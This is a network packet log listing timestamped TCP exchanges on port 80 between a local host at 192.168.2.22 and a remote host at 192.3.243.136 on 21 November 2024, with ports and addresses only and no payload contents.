Nov 21, 2024 01:20:47.548589945 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.548644066 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.552366018 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.552423954 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.552464008 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.552520037 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.556269884 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.556339025 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.556379080 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.556433916 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.560174942 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.560234070 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.560285091 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.560336113 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.564084053 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.564161062 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.564165115 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.564214945 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.567955971 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.568013906 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.568016052 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.568064928 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.571875095 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.571927071 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.572015047 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.572068930 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.575792074 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.575865984 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.575897932 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.575951099 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.579694033 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.579754114 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.579854012 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.579909086 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.583564997 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.583622932 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.583662987 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.583717108 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.587574959 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.587632895 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.587673903 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.587734938 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.591415882 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.591485977 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.591614962 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.591670036 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.595256090 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.595328093 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.595366955 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.595422029 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.614099026 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.614173889 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.614209890 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.614248991 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.616038084 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.616106987 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.616137981 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.616182089 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.622380018 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.622467041 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.622473955 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.622515917 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.626738071 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.626815081 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.626852036 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.626899958 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.628695965 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.628751993 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.695658922 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.695683956 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.695863008 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.696839094 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.696909904 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.697208881 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.697252989 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.699754953 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.699810028 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.699850082 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.699892044 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.702768087 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.702841043 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.702848911 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.702886105 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.705621004 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.705717087 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.705809116 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.705861092 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.708436966 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.708491087 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.708620071 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.708676100 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.711220980 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.711272001 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.711328030 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.711379051 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.713989973 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.714059114 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.714097023 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.714142084 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.716690063 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.716766119 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.716811895 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.716864109 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.719367027 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.719418049 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.719461918 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.719516993 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.722043037 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.722105026 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.722145081 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.722193003 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.724581003 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.724636078 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.724693060 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.724744081 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.727184057 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.727264881 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.727267027 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.727319956 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.729795933 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.729854107 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.729923010 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.729975939 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.732402086 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.732460976 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.732531071 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.732601881 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.734978914 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.735042095 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.735115051 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.735171080 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.737591028 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.737699032 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.737795115 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.737854004 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.740288973 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.740345001 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.740345001 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.740386963 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.741761923 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.741816044 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.741817951 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.741858959 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.743355989 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.743413925 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.743424892 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.743474007 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.744869947 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.744919062 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.745110035 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.745162964 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.746481895 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.746551037 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.746586084 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.746644020 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.748011112 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.748115063 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.748119116 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.748168945 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.749526024 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.749577999 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.749644041 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.749694109 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.751157045 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.751210928 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.751293898 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.751348019 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.752639055 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.752691031 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.752746105 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.752794981 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.754177094 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.754245043 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.754252911 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.754302025 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.815495968 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.815546036 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.815684080 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.816246986 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.816302061 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.816406965 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.816406965 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.817785978 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.817845106 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.817905903 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.817960978 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.819348097 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.819405079 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.819924116 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.819982052 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.820050001 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.820106983 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.821465969 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.821522951 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.821592093 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.821645975 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.823038101 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.823098898 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.823203087 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.823259115 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.824563026 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.824624062 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.824681997 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.824745893 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.826123953 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.826181889 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.826217890 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.826267958 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.827682018 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.827743053 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.827785015 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.827836037 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.829282999 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.829344034 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.829411030 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.829466105 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.830837965 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.830895901 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.830961943 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.831017017 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.832324982 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.832381964 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.832392931 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.832446098 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.833882093 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.833939075 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.834005117 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.834068060 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.835437059 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.835493088 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.835560083 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.835619926 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.837023973 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.837083101 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.837182999 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.837236881 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.838531017 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.838602066 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.838665962 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.838707924 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.840085030 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.840137959 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.840141058 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.840183020 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.841650963 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.841711044 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.841767073 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.841831923 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.843180895 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.843240023 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.843306065 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.843367100 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.844733953 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.844790936 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.844796896 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.844840050 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.846365929 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.846401930 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.846431971 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.846448898 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.847851038 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.847908974 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.847979069 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.848033905 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.849428892 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.849483013 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.849670887 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.849723101 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.850971937 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.851028919 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.851036072 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.851087093 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.852489948 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.852545023 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.852549076 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.852588892 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.896692038 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.896795988 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.896850109 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.896893024 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.897452116 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.897520065 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.897561073 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.897617102 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.898911953 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.898968935 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.899033070 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.899091005 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.900430918 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.900494099 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.900559902 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.900614023 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.902061939 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.902123928 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.902184010 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.902249098 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.903569937 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.903639078 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.903688908 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.903743982 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.905109882 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.905191898 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.905216932 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.905281067 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.906663895 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.906773090 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.906796932 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.906822920 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.908180952 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.908241034 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.908296108 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.908351898 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.909760952 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.909817934 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.909883976 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.909941912 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.911283016 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.911358118 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.911395073 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.911448002 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.912827015 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.912882090 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.912939072 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.912983894 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.914432049 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.914488077 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.914489985 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.914536953 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.915927887 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.915986061 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.916069984 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.916126013 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.917489052 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.917547941 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.917594910 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.917649984 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.919038057 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.919095993 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.919162035 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.919214010 CET	49165	80	192.168.2.22	192.3.243.136
